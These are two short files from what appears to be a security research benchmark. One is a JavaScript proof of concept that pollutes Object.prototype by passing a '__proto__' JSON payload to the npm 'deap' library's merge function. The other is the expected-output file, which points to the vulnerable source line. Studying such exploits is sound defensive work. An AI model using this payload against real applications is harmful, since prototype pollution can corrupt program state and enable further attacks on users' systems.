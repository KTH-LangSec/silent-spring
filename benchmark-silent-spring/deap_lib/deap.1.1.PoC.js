//https://snyk.io/vuln/npm:deap:20180415
const deap= require('deap');

deap.merge({}, JSON.parse('{ "__proto__": { "polluted": "yes" } }'));

console.log({}.polluted);
