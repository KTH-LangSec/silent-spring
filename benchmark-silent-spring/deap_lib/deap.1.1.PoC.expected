node_modules/deap/lib/deap.js:117:10